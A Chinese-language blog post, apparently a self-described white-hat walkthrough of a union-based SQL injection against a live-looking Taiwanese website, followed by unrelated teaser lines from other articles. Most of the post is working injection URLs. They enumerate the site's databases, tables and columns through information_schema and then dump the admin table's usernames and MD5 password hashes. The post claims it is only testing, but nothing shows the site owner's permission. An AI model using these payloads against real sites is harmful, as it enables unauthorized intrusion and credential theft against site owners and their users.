目录
作为一个防御型白帽子子
你一定要知道进攻套路
才能有相应的防御措施
声明:只做测试,发现对方的漏洞,并不进行破坏性操作
1、存在SQL注入漏洞
2、SQL注入查询长度为9个字段,即 union select 1,2,3,4,5,6,7,8,9
3、网站无错误回显,SQL执行错误显示空白页面
1、数据库版本:mysql 5.7.31
2、当前数据库:jiuyu_jiuyu
3、当前登录用户:jiuyu@localhost
4、注入点:http://www.xxx.com.tw/page.php?id=133 union select 1,2,version(),current_user(),5,6,7,8,9
在mysql数据库中
当前登录用户下,会有一个information_schema数据库
这个数据库里包含了当前用户权限下
所有database、table、column、privilege等等的汇总信息
在注入过程中,可以充分利用。
?
?
然后我们根据当前获得的信息,进行进一步的数据库分析
?
#拼接注入连接
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,count(distinct(table_schema)),4,5,6,7,8,9 FROM information_schema.tables
#通过information_schema数据库获取数据库相关信息
?
通过注入SQL语句
得到了数据库的数量 2 个
?
#通过使用limit 可以逐条返回表数据
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,table_schema,4,5,6,7,8,9 FROM information_schema.tables
limit 2
?
通过添加两个limit,限定两条返回值
得到了仅有的两个数据库名称
information_schema 和 jiuyu_jiuyu
information_schema是默认的信息汇总表
所有,有用的就是jiuyu_jiuyu这个库
?
?
?
得到了目标数据库:jiuyu_jiuyu
下面对该数据库进行分析
?
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,count(distinct(table_name)),4,5,6,7,8,9 FROM information_schema.tables
where table_schema='jiuyu_jiuyu'
#返回值为 4个表
?
--只有4个表,使用limit 逐条获取表名
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,table_name,4,5,6,7,8,9 FROM information_schema.tables
where table_schema='jiuyu_jiuyu'
limit 1
依次得到四个表
admin
smallclass
wenzhang
neirong
?
?
emmm 经过认真分析
不难发现
admin表会有一些重要信息
其他的wenzhang、neirong之类的应该是一些新闻信息
下面 我们就对admin表进行数据获取
?
--获取admin表的字段数量
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,count(1),4,5,6,7,8,9 FROM information_schema.columns
where table_name='admin'
#包含四个字段
?
--获取admin表字段名称
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columns
where table_name='admin'
limit 1
?
通过limit?逐条获取admin表的字段值???
id
username
password
quanxian
是不是有点紧张
用户名信息什么的
--获取admin表的数据值
http://www.xxx.com.tw/page.php?id=133
union
select 1,2,username,password,5,6,7,8,9 FROM jiuyu_jiuyu.admin
?
成功获取用户信息返回值。
当然,信息是md5过的
如果想破解出明文。。。不!你不想!
?
[Thistopicispre-releasedocumentationandissubjecttochangeinfuturereleases.Bl...
5月8日中国知名的独立云服务商金山云正式在美国纳斯达克挂牌交易股票代码?“KC”...
前言 在上一篇 Jenkins 使用环境变量 中,帮助大家使用一条 Docker 命令就可以快...
一、安装Anaconda 1、下载安装Anaconda。 去官网下载,打开安装包: Next: I Ag...
提示:我提取了《xslt从入门到精通》中关于空格解释的核心部分,借以抛砖引玉,...
参考链接 亲测试以下版本成功激活附激活教程。 idea下载链接(对应版本号下载): ...
复制代码 代码如下: ?xml version="1.0" encoding="utf-8"? s:MXDataGridItemRen...
wangEditor是基于javascript和css开发的 Web富文本编辑器, 轻量、简洁、易用、...
在ASP中传递参数时有一个很有用的系统函数Server.UrlEncode,可以将一些非字母数...
用Javascript实现留言板案例(附带删除留言),供大家参考,具体内容如下 正在学...